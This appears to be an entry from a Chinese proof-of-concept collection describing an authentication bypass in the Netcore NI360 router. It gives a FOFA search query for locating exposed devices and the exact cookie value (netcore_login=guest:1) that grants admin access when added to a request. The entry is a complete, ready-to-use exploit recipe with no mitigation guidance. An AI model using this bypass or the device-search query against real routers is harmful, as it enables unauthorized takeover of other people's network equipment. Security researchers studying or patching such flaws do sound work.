Awesome-POC/网络设备漏洞/磊科 NI360路由器 认证绕过漏洞.md

# 磊科 NI360路由器 认证绕过漏洞

## 漏洞描述

磊科 NI360路由器 存在认证绕过漏洞，通过添加特定的Cookie字段获取后台权限

## 漏洞影响

```
磊科 NI360路由器
```

## FOFA

```
title="Netcore"
```

## 漏洞描述

登录页面如下

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110949810.png)

添加 Cookie字段 : **netcore_login=guest:1**

刷新后登录后台

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110949667.png)